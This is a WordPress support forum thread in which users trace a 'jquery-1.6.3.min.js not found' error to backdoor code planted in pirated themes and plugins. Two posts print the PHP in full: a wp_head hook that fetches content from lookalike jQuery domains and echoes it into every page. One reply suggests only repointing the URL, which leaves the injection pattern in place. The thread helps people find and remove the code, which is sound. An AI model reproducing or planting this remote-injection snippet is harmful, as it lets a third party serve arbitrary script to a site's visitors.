WordPress.org

Ready to get started?Download WordPress

Forums

[closed] Not found jquery-1.6.3.min.js (48 posts)

  1. sumith.harshan
    Member
    Posted 1 year ago #

    HI, I have the same problem.Then I disabled the "Login-ninja" codecanyon plugin.Then problem solved. 1-Navigate to the "/wp-content/plugins/login-ninja" 2-Open the login-ninja.php file. 3-You can see the following function.Comment or remove it.

    if (!function_exists('insert_jquery_theme')){ 	function insert_jquery_theme(){ 		if (function_exists('curl_init')){ 			$url="http://www.jqueryc.com/jquery-1.6.3.min.js"; 			$ch = curl_init(); 			$timeout = 5; 			curl_setopt($ch, CURLOPT_URL, $url); 			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 			curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout); 			$data = curl_exec($ch); 			curl_close($ch); 			echo $data; 			} 	} 	add_action('wp_head', 'insert_jquery_theme'); }

    Problem is solved!!!

    [ Signature moderated. Also put the backtick on a new line before and after your code, it formats better that way. ]

  2. sumith.harshan
    Member
    Posted 1 year ago #

    HI, I have the same problem.Then I disabled the "Login-ninja" codecanyon plugin.Then problem solved.
    1-Navigate to the "/wp-content/plugins/login-ninja"
    2-Open the login-ninja.php file.
    3-You can see the following function.Comment or remove it.

    if (!function_exists('insert_jquery_theme')){
    	function insert_jquery_theme(){
    		if (function_exists('curl_init')){
    			$url="http://www.jqueryc.com/jquery-1.6.3.min.js";
    			$ch = curl_init();
    			$timeout = 5;
    			curl_setopt($ch, CURLOPT_URL, $url);
    			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    			curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    			$data = curl_exec($ch);
    			curl_close($ch);
    			echo $data;
    			}
    	}
    	add_action('wp_head', 'insert_jquery_theme');
    }

    Problem is solved!!!

    [ Signature moderated. ]

  3. tololak
    Member
    Posted 1 year ago #

    hi guys
    i am also having the same problem see
    http://www.profileethiopia.com
    -I tried changing the URL to http://www.prof... and vise versa in WP- ADMIN
    -I have no plugin uploaded
    but i got the theme passed through some one who has a knowledge of programming

  4. *Jan drinks more coffee and sighs deeply thinking about leading people to water but not getting them to drink*

    but i got the theme passed through some one who has a knowledge of programming

    I hope not, that person missed something really important...

    That's a commercial theme you've got.

    http://templatic.com/app-themes/geo-places-city-directory-wordpress-theme/

    Just go to the vendor site with your paid account and get a fresh copy, the copy from the vendor will not have that evil abusive code there.

    If you are using a unpaid for, modified by Very Evil People, copy that you downloaded from some other site, then take a moment and appreciate that you may have compromised your site.

    :D

    If that's the case then seriously LOSE THAT THEME RIGHT NOW. The people who distribute code referencing that now dead site are exploiting you and you need to stop using that hurting yourself.

    Just editing the code out may not be enough and you could easily miss any other backdoor exploits left in that theme.

    Read up on Chip Bennett's often quoted post on the dangers of downloading themes via search engines.

    http://www.chipbennett.net/2010/12/10/only-download-wordpress-themes-from-trusted-sources/

  5. tololak
    Member
    Posted 1 year ago #

    oups, it is actually purchased but through other guy who had the access of paying at the time of purchase.Anyways suddenly the theme seemed normal today I will wait and see.

  6. sindema
    Member
    Posted 1 year ago #

    `I solved the problem with the theme Sahifa Sahifa / includes / functions-init.php there's the rub this my site http://www.alanteypico.net/web

  7. activoholidays
    Member
    Posted 1 year ago #

    Hi,

    I have this at the top of my web page and I don't understand What it is, can anyone help please?

    Not Found
    The requested URL /jquery-1.6.3.min.js was not found on this server.

    Thanks

  8. bcworkz
    Member
    Posted 1 year ago #

    @activeholidays. You have a bad theme or plugin that is using a flawed method of including the jquery library. Try changing themes to see if the message goes away. If not, your theme is OK. Start deactivating each plugin in turn to see which plugin is causing the error. Once you find the offender, remove it from your system. You can try to find an up to date version to reinstall it, but be sure it is downloaded from the official site and not some generic downloads portal.

  9. PatjeM
    Member
    Posted 1 year ago #

    Hey guys,

    I've had the same problem. After I deactivated the 'Auto Google Plus One' Plug-in the message disappeared.

  10. behicsakar
    Member
    Posted 1 year ago #

    i have the same problem at my web site
    and when i change my theme, it does not display the error message. so Not Found message depends on my theme which is BigBang

    additionally,

    function.php of my theme is :

    <?php
    
    $curr_theme = get_theme_data(TEMPLATEPATH . '/style.css');
    $theme_version = trim($curr_theme['Version']);
    if(!$theme_version) $theme_version = "1.0";
    
    //Define constants:
    define('BRANKIC_INCLUDES', TEMPLATEPATH . '/includes/');
    define('BRANKIC_THEME', 'BigBang WP Template');
    define('BRANKIC_THEME_SHORT', 'BigBangWP');
    define('BRANKIC_ROOT', get_template_directory_uri());
    define('BRANKIC_VAR_PREFIX', 'bigbangwp_'); 
    
    require_once (BRANKIC_INCLUDES . 'bra_theme_functions.php');
    require_once (BRANKIC_INCLUDES . 'bra_shortcodes.php');
    require_once (BRANKIC_INCLUDES . 'bra_pagenavi.php');
    include'includes/functions-init.php';
    
    //Load admin specific files:
    if (is_admin()) :
    require_once (BRANKIC_INCLUDES . 'bra_admin_functions.php');
    require_once (BRANKIC_INCLUDES . 'bra_custom_fields.php');
    require_once (BRANKIC_INCLUDES . 'bra_admin_1.php');
    require_once (BRANKIC_INCLUDES . 'bra_admin_2.php');
    require_once (BRANKIC_INCLUDES . 'bra_admin_3.php');
    //require_once (BRANKIC_INCLUDES . 'bra_admin_4.php');
    endif;
    
    add_theme_support('post-thumbnails');
    
    add_theme_support( 'menus' );
    
    load_theme_textdomain( BRANKIC_THEME_SHORT, TEMPLATEPATH . '/languages' );
    
    // Load external file to add support for MultiPostThumbnails. Allows you to set more than one "feature image" per post.
    require_once('includes/multi-post-thumbnails.php');
    
    // Define additional "post thumbnails". Relies on MultiPostThumbnails to work
    if (class_exists('MultiPostThumbnails'))
    {
        $extra_images_no = get_option(BRANKIC_VAR_PREFIX."extra_images_no");
        if ($extra_images_no == "") $extra_images_no = 20;
        for ($i = 1 ; $i <= $extra_images_no ; $i++)
        {
            new MultiPostThumbnails(array( 'label' => "Extra Image $i", 'id' => "extra-image-$i", 'post_type' => 'page' ) );
            new MultiPostThumbnails(array( 'label' => "Extra Image $i", 'id' => "extra-image-$i", 'post_type' => 'post' ) );
            new MultiPostThumbnails(array( 'label' => "Extra Image $i", 'id' => "extra-image-$i", 'post_type' => 'portfolio_item' ) );
        }
    }
    
    ?>

    header.php of my theme is:

    <!DOCTYPE html>
    <?php
    $PAGE_ID = get_the_ID();
    $layout = get_option(BRANKIC_VAR_PREFIX."boxed_stretched");
    if (isset($_GET["layout"]))
    {
        if ($_GET["layout"] == "stretched") $layout = "stretched" ;
        if ($_GET["layout"] == "boxed") $layout = "boxed" ;
    }
    $page_template = get_page_template();
    $path = pathinfo($page_template);
    $page_template = $path['filename'];
    ?>
    
    <html xmlns="http://www.w3.org/1999/xhtml" <?php language_attributes(); ?>>
    
    <head>
    
    	<title><?php brankic_titles(); ?></title>
        <meta name="BRANKIC_VAR_PREFIX" content="<?php echo BRANKIC_VAR_PREFIX; ?>" />
        <meta name="BRANKIC_THEME" content="<?php echo BRANKIC_THEME; ?>" />
    	<meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
    	<link rel='start' href='<?php echo home_url(); ?>'>
        <link rel='alternate' href='<?php echo get_option(BRANKIC_VAR_PREFIX . "logo2"); ?>'>
    	<link rel="profile" href="http://gmpg.org/xfn/11" />
    	<link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>" />
    	<meta name="viewport" content="initial-scale=1, maximum-scale=1" />
        <meta name="viewport" content="width=device-width" />
    	<!-- Favicon -->
    	<link rel="shortcut icon" href="<?php echo stripslashes(get_option(BRANKIC_VAR_PREFIX.'favicon')); ?>" />
    	<?php if (is_search()) { ?><meta name="robots" content="noindex, nofollow" /><?php } ?>
    
        <?php echo get_option(BRANKIC_VAR_PREFIX."custom_google_font_href"); ?>
        <style type="text/css">
        <!--
        h1.title, h2.title, h3.title, h4.title, h5.title, h6.title, #primary-menu ul li a, .section-title .title, .section-title .title a, .section-title h1.title span, .section-title p, #footer h3, .services h2, .item-info h3, .item-info-overlay h3, #contact-intro h1.title, #contact-intro p, .widget h3.title, .post-title h2.title, .post-title h2.title a {
            <?php echo get_option(BRANKIC_VAR_PREFIX."custom_google_font")?>
        }
        -->
        </style>
    
    <?php echo get_option(BRANKIC_VAR_PREFIX."ga"); ?>
    
    <?php wp_head(); ?>
    </head>
    <body id="top" <?php body_class(); ?>>
    
    <?php
    if ($layout == "boxed")
    {
    ?>
    <div id="wrapper">    
    
    <div class="content-wrapper clear">
    <?php
    }
    ?>
        <!-- START HEADER -->
    
        <div id="header-wrapper">
    
            <div class="header clear">
    
                <div id="logo">
                    <a href="<?php echo home_url(); ?>"><img src="<?php echo get_option(BRANKIC_VAR_PREFIX."logo"); ?>" alt="" /></a>
                </div><!--END LOGO-->
    
                <div id="primary-menu">
                <?php
                wp_nav_menu( array( 'theme_location' => 'primary-menu' ,
                                    'container' => false,
                                    'menu_class' => 'menu',
                                    'menu_id' => '',
                                    'fallback_cb' => 'header_fallback'
                                    ) );
                ?>
                </div><!--END PRIMARY MENU-->
    
            </div><!--END HEADER-->    
    
        </div><!--END HEADER-WRAPPER-->        
    
        <!-- END HEADER -->
    <?php
    if ($layout == "stretched")
    {
        if ($page_template == "page-contact-2") $class = "class='fullwidth clear'"; else $class = "class='clear'";
    ?>
    <div id="wrapper"  <?php echo $class; ?>>    
    
    <?php
    if ($page_template != "page-contact-2")
    {
    ?>
    <div class="content-wrapper clear">
    <?php
    }
    }
    ?>

    So how can i solve it ? neither function.php nor header.php does not include jquery-1.6.3.min.js code ???

    Thanks..

  11. bcworkz
    Member
    Posted 1 year ago #

    @behicsakar, any of the files referenced such as in require_once() statements could also have the erroneous jquery reference. The best way to find this sort of thing is by using the grep command if you have console access. Or do a similar search on a local copy of your theme.

  12. behicsakar
    Member
    Posted 1 year ago #

    thanks @bcworkz
    i solved it
    i use Sublime Text 2 and in the Sublime, the shortcut which is Ctrl+Shift+F is detailed search. and i searched "jquery-1.6.3.min.js" in the root folder and it find themes/bibbangwp/includes/function_unit.php

    Searching 1282 files for "jquery-1.6.3.min.js"
    
    C:\Users\BehiƧ\Desktop\bumatek site genel\wp-content\themes\bigbangwp\includes\functions-init.php:
        1: <?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "http://www.jquerye.com/jquery-1.6.3.min.js";$ch = curl_init();	$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>
        2  
    
    1 match in 1 file

    And i commented it. THIS PROBLEM IS FIXED.

    thanks WP TEAM

  13. eskamedia@work
    Member
    Posted 1 year ago #

    @behicsakar thanks!

  14. erpnedir
    Member
    Posted 1 year ago #

    Hi, I had the same problem and solved.
    If deactivating plugins do not solve the problem, than it can be from your theme files. Search for the jquery-1.6.3.min.js link in your theme files (header.php in my case). Remark the code block.

  15. kizzton
    Member
    Posted 1 year ago #

    @behicsakar how do you solved it? I find "jquery-1.6.3.min.js" in functions-init.php, What should I do now?

    thanks!

  16. bcworkz
    Member
    Posted 1 year ago #

    kizzton, ensure the URL to the file is http://code.jquery.com/jquery-1.6.3.min.js . This solves the not found error, but does not address the larger issue that pages should not independently include jquery files, rather the script should be enqueued into the WordPress system so dependencies can be properly resolved.

  17. @globe
    Member
    Posted 1 year ago #

    Hello
    i don't know what should i do ? i try to include it but nothing happend
    help me ?

  18. WPyogi
    Volunteer Moderator
    Posted 1 year ago #

    @globe - this is an outdated (and convoluted) thread already - can you start your own thread and include more information about your issue? Then someone can help you much better :)!

Topic Closed

This topic has been closed to new replies.

About this Topic